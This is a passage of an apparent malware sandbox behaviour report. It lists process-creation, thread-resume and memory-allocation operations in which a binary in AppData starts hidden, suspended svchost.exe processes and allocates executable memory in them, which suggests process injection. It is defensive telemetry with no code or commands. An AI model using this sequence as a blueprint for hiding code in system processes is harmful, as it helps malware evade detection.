| Create | svchost.exe | os_pid = 0x4d8, creation_flags = CREATE_SUSPENDED, CREATE_NORMAL_PRIORITY_CLASS, CREATE_UNICODE_ENVIRONMENT, CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 | |
| Create | svchost.exe | os_pid = 0xa60, creation_flags = CREATE_SUSPENDED, CREATE_NORMAL_PRIORITY_CLASS, CREATE_UNICODE_ENVIRONMENT, CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 | |
| Create | svchost.exe | os_pid = 0x110, creation_flags = CREATE_SUSPENDED, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_SHOWNOACTIVATE |
|
1 | |
| Create | svchost.exe | os_pid = 0x6d8, creation_flags = CREATE_SUSPENDED, CREATE_NORMAL_PRIORITY_CLASS, CREATE_UNICODE_ENVIRONMENT, CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 | |
| Create | svchost.exe | os_pid = 0xa70, creation_flags = CREATE_SUSPENDED, CREATE_NORMAL_PRIORITY_CLASS, CREATE_UNICODE_ENVIRONMENT, CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 | |
| Create | svchost.exe | os_pid = 0xb28, creation_flags = CREATE_SUSPENDED, CREATE_NORMAL_PRIORITY_CLASS, CREATE_UNICODE_ENVIRONMENT, CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 | |
| Create | svchost.exe | os_pid = 0xda0, creation_flags = CREATE_SUSPENDED, CREATE_NORMAL_PRIORITY_CLASS, CREATE_UNICODE_ENVIRONMENT, CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 | |
| Create | svchost.exe | os_pid = 0x748, creation_flags = CREATE_SUSPENDED, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_SHOWNOACTIVATE |
|
1 | |
| Enumerate Processes | - | - |
|
1182 | |
| Enumerate Processes | - | - |
|
21 | |
| Get Info | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Thread (8)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Resume | c:\windows\system32\svchost.exe | os_tid = 0x9e8 |
|
1 | |
| Resume | c:\windows\system32\svchost.exe | os_tid = 0xa94 |
|
1 | |
| Resume | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | os_tid = 0x264 |
|
1 | |
| Resume | c:\windows\system32\svchost.exe | os_tid = 0x524 |
|
1 | |
| Resume | c:\windows\system32\svchost.exe | os_tid = 0xa6c |
|
1 | |
| Resume | c:\windows\system32\svchost.exe | os_tid = 0xb38 |
|
1 | |
| Resume | c:\windows\system32\svchost.exe | os_tid = 0xd90 |
|
1 | |
| Resume | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | os_tid = 0x264 |
|
1 |
Memory (7294)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | svchost.exe | address = 327680, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 367 |
|
1 | |
| Allocate | svchost.exe | address = 393216, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 112 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 28672 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 268439552, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 10240 |
|
1 | |
| Allocate | svchost.exe | address = 268451840, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 3584 |
|
1 | |
| Allocate | svchost.exe | address = 268455936, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1004 |
|
1 | |
| Allocate | svchost.exe | address = 268460032, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26 |
|
4 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
7 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17 |
|
7 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
45 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20 |
|
6 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 10 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 25 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 18 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 19 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 13 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 27 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 28 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 21 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 22 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 11 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 5 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 7 |
|
1 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 1310720, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 388 |
|
1 | |
| Allocate | svchost.exe | address = 1376256, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 40 |
|
1 | |
| Allocate | svchost.exe | address = 327680, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 367 |
|
1 | |
| Allocate | svchost.exe | address = 393216, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 112 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 28672 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 268439552, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 10240 |
|
1 | |
| Allocate | svchost.exe | address = 268451840, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 3584 |
|
1 | |
| Allocate | svchost.exe | address = 268455936, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1004 |
|
1 | |
| Allocate | svchost.exe | address = 268460032, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26 |
|
4 | |
| Allocate | svchost.exe | address = 458752, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
7 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17 |
|
7 | |
| Allocate | svchost.exe | address = 458752, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
45 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 10 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 25 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 18 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 19 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 13 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 27 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 28 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 21 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 22 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 11 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 5 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 7 |
|
1 | |
| Allocate | svchost.exe | address = 458752, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
2 | |
| Allocate | svchost.exe | address = 1048576, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 388 |
|
1 | |
| Allocate | svchost.exe | address = 3473408, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 40 |
|
1 | |
| Allocate | svchost.exe | address = 3538944, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20 |
|
1 | |
| Allocate | svchost.exe | address = 1048576, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 128 |
|
1 | |
| Allocate | svchost.exe | address = 3473408, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 3604480, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 44 |
|
1 | |
| Allocate | svchost.exe | address = 327680, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 367 |
|
1 | |
| Allocate | svchost.exe | address = 393216, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 112 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 618496 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 268439552, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 343040 |
|
1 | |
| Allocate | svchost.exe | address = 268783616, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 80384 |
|
1 | |
| Allocate | svchost.exe | address = 268865536, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 165288 |
|
1 | |
| Allocate | svchost.exe | address = 269033472, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 269037568, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 269041664, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 12288 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26 |
|
7 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
11 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
188 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 21 |
|
9 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 13 |
|
17 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14 |
|
13 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 10 |
|
8 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 22 |
|
7 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
17 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 18 |
|
10 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15 |
|
20 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20 |
|
9 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17 |
|
13 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 19 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24 |
|
11 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 23 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
24 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9 |
|
11 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 25 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 28 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 11 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 29 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 38 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
7 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 7 |
|
7 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 53 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 30 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 27 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 34 |
|
2 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
2 | |
| Allocate | svchost.exe | address = 2097152, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 388 |
|
1 | |
| Allocate | svchost.exe | address = 2162688, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 40 |
|
1 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 5 |
|
2 | |
| Allocate | svchost.exe | address = 2293760, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 132460 |
|
1 | |
| Allocate | svchost.exe | address = 2162688, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 6029312, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 128 |
|
3 | |
| Allocate | svchost.exe | address = 6094848, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
3 | |
| Allocate | svchost.exe | address = 6160384, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 44 |
|
3 | |
| Allocate | svchost.exe | address = 2293760, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 85256 |
|
1 | |
| Allocate | svchost.exe | address = 2424832, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
1 | |
| Allocate | svchost.exe | address = 2293760, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 747 |
|
1 | |
| Allocate | svchost.exe | address = 2359296, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 327680, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 367 |
|
1 | |
| Allocate | svchost.exe | address = 393216, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 112 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1150976 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 268439552, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 822784 |
|
1 | |
| Allocate | svchost.exe | address = 269262848, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 145920 |
|
1 | |
| Allocate | svchost.exe | address = 269410304, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 128664 |
|
1 | |
| Allocate | svchost.exe | address = 269541376, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 269545472, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 269549568, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 269553664, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 29696 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26 |
|
7 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 19 |
|
12 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
57 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
8 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 13 |
|
23 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9 |
|
16 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20 |
|
11 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15 |
|
17 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 18 |
|
7 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 21 |
|
8 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
20 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 22 |
|
8 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14 |
|
16 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 10 |
|
8 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 11 |
|
8 | |
